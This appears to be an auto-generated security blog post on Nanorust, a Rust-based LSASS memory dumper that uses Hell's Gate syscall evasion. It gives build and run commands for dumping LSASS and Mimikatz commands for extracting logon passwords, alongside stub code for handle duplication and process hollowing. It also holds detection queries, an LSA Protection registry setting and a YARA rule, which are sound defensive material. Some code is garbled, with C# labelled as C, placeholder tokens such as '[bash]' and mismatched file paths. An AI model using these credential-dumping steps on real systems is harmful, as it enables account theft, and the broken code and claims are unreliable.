Nanorust: The Rust-Powered LSASS Memory Dumper That’s Making EDRs Sweat + Video

Listen to this Post

Featured Image

Introduction:

The eternal cat-and-mouse game between red team operators and endpoint detection has just escalated with Nanorust—a Rust-based rewrite of the infamous Nanodump tool that specifically targets LSASS processes where Windows credentials live. By leveraging advanced syscall obfuscation techniques including Hell’s Gate and Tartarus Gate, this tool represents a significant evolution in how attackers can bypass security monitoring to extract sensitive authentication data directly from memory.

Learning Objectives:

  • Understand how Nanorust implements Hell’s Gate and Tartarus Gate syscall techniques to evade EDR hooks
  • Master the handle duplication method for accessing LSASS without direct process opening
  • Deploy and configure Nanorust in controlled red team environments for credential harvesting exercises
  • Identify detection signatures and implement mitigation strategies against such memory dumping attacks

You Should Know:

1. Building and Deploying Nanorust on Windows Targets

Nanorust requires Rust 1.88+ and specifically targets x64 Windows systems. The build process is straightforward but requires proper environment setup:

 Install Rust if not already present (PowerShell as administrator)
winget install Rustlang.Rustup

Verify installation
rustc --version
cargo --version

Clone the Nanorust repository
git clone https://github.com/Hakumarachi/Nanorust.git
cd Nanorust

Build the release version with optimizations
cargo build --release

The compiled binary will be at .\target\release\nanorust.exe

What this does: Compiles the Nanorust memory dumping tool with full optimizations, creating a standalone executable that implements all evasion techniques.

  1. Hell’s Gate and Tartarus Gate: Syscall Evasion Explained

Nanorust implements Hell’s Gate, a technique that dynamically resolves syscall numbers from ntdll.dll at runtime, bypassing hooked functions. Here’s how to verify this behavior:

 Monitor syscalls being used (requires Sysmon with appropriate config)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | 
Where-Object { $_.Message -match "NtReadVirtualMemory|NtOpenProcess" } |
Select-Object TimeCreated, Message -First 10

Check if Nanorust is bypassing user-mode hooks using API Monitor
 Download API Monitor from http://www.rohitab.com/apimonitor
 Attach to nanorust.exe process and filter for syscalls

The Tartarus Gate enhancement extends Hell’s Gate by adding indirect syscall invocation, making detection even more challenging.

3. Handle Duplication Technique for LSASS Access

One of Nanorust’s stealthiest features is handle duplication—instead of directly opening LSASS (which triggers alerts), it duplicates an existing handle:

// Conceptual C code showing handle duplication (for educational purposes)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class HandleDuplicationDemo
{
[DllImport("ntdll.dll", SetLastError = true)]
static extern int NtOpenProcess(ref IntPtr ProcessHandle, uint AccessMask, 
ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId);

[DllImport("ntdll.dll", SetLastError = true)]
static extern int NtDuplicateObject(IntPtr SourceProcessHandle, 
IntPtr SourceHandle, IntPtr TargetProcessHandle, out IntPtr TargetHandle, 
uint DesiredAccess, uint HandleAttributes, uint Options);

// Find a process with a handle to LSASS and duplicate it
static void DuplicateLsassHandle()
{
// Implementation would enumerate process handles and duplicate
// those pointing to LSASS process ID
}
}

4. Executing Nanorust for Credential Extraction

Once compiled, executing Nanorust requires understanding its command-line options:

 Basic execution (dumps LSASS to default location)
.\nanorust.exe

Specify custom output file
.\nanorust.exe -o C:\temp\lsass.dmp

Use handle duplication method specifically
.\nanorust.exe --duplicate-handle

Combine with process injection for added stealth
.\nanorust.exe --inject --target-pid 1234

Verify successful dump
dir C:\temp.dmp

Analyze the dump with Mimikatz (on attacker machine)
mimikatz  sekurlsa::minidump lsass.dmp
mimikatz  sekurlsa::logonPasswords

5. Detecting and Mitigating Nanorust Attacks

Blue team members can implement these detection measures:

 PowerShell detection script for LSASS access anomalies
$lsass = Get-Process lsass -ErrorAction SilentlyContinue
if ($lsass) {
$lsassId = $lsass.Id

Monitor for processes accessing LSASS
Get-WinEvent -FilterHashtable @{
LogName = 'Security'
ID = 4656, 4663  Handle access events
} | Where-Object { $_.Properties[bash].Value -eq $lsassId } |
Format-Table TimeCreated, Message -AutoSize

Check for suspicious process creation
Get-WinEvent -LogName 'Security' -FilterXPath 
"[System[EventID=4688]]" |
Where-Object { $_.Properties[bash].Value -match 'nanorust|lsass' } |
Select-Object TimeCreated, Message
}

Enable PPL (Protected Process Light) for LSASS
 Add registry key to enable LSA Protection
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
-Name "RunAsPPL" -Value 1 -PropertyType DWord -Force

Restart for changes to take effect
 This prevents non-PPL processes from accessing LSASS

6. Linux Cross-Compilation for Windows Targets

Security researchers can cross-compile Nanorust from Linux:

 Install cross-compilation target
rustup target add x86_64-pc-windows-gnu

Install MinGW for Windows linking
sudo apt install mingw-w64

Cross-compile
cargo build --release --target x86_64-pc-windows-gnu

The Windows executable will be at:
 ./target/x86_64-pc-windows-gnu/release/nanorust.exe

7. Advanced Evasion: Combining with Process Hollowing

For red team exercises, Nanorust can be combined with process hollowing:

// Conceptual Rust code for process hollowing (simplified)
use windows::Win32::System::Diagnostics::Debug::;
use windows::Win32::System::Threading::;
use windows::Win32::Foundation::;

unsafe fn hollow_process(target_path: &str) -> Result<(), Box<dyn std::error::Error>> {
// 1. Create suspended process
// 2. Unmap original executable memory
// 3. Allocate memory and write Nanorust payload
// 4. Set entry point and resume thread

Ok(())
}

8. YARA Rules for Nanorust Detection

Create YARA rules to identify Nanorust binaries:

rule Nanorust_Memory_Dumper {
meta:
description = "Detects Nanorust LSASS memory dumper"
author = "Security Research"
date = "2024-01-15"

strings:
$s1 = "NtOpenProcess" wide ascii
$s2 = "NtReadVirtualMemory" wide ascii
$s3 = "Hell's Gate" wide ascii
$s4 = "Tartarus Gate" wide ascii
$s5 = "lsass.exe" wide ascii nocase
$s6 = "duplicate-handle" wide ascii

condition:
3 of ($s) or (all of ($s1,$s2,$s5))
}

9. Memory Forensics to Detect Past Attacks

Use Volatility 3 to identify LSASS dumping artifacts:

 Install volatility3
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

Analyze memory dump for LSASS access
python vol.py -f memory.dump windows.cmdline.CmdLine

Check for process handle leaks
python vol.py -f memory.dump windows.handles.Handles --pid [bash]

Look for suspicious memory sections
python vol.py -f memory.dump windows.malfind.Malfind

Verify if LSASS was accessed by non-system processes
python vol.py -f memory.dump windows.pslist.PsList

What Undercode Say:

Key Takeaway 1: Nanorust represents a dangerous evolution in credential dumping tools by combining Rust’s performance with advanced syscall evasion techniques. Its implementation of Hell’s Gate and Tartarus Gate makes it significantly harder for traditional EDR solutions that rely on user-mode API hooking to detect malicious LSASS access.

Key Takeaway 2: The handle duplication technique is particularly concerning because it leverages legitimate process interactions—finding a process that already has a handle to LSASS and duplicating it bypasses the need to call NtOpenProcess directly, which is heavily monitored.

The shift to Rust for malware development is accelerating because it provides memory safety without garbage collection, produces smaller binaries, and offers better cross-platform capabilities. For blue teams, this means updating detection strategies to focus on abnormal memory access patterns rather than simple API call monitoring. Implementing LSA Protection (RunAsPPL), Credential Guard, and aggressive handle auditing are essential countermeasures. Organizations should also deploy Sysmon with comprehensive rule sets that flag any process attempting to read LSASS memory, regardless of how the handle was obtained. The arms race continues, and tools like Nanorust ensure that security professionals must constantly evolve their defensive strategies.

Prediction:

Within the next 6-12 months, we’ll see mainstream EDR vendors releasing signature updates specifically targeting Nanorust’s syscall patterns, followed by the emergence of Rust-based offensive toolkits that combine multiple evasion techniques (Hell’s Gate, Tartarus Gate, and Halos Gate) into unified frameworks. Simultaneously, Microsoft will likely enhance LSASS protections in Windows 12 or through cumulative updates, possibly requiring TPM-backed isolation for LSA processes. This will push attackers toward alternative credential access methods, including memory scraping of other processes and cloud authentication token theft.

▶️ Related Video (88% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Splog Nanorust – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky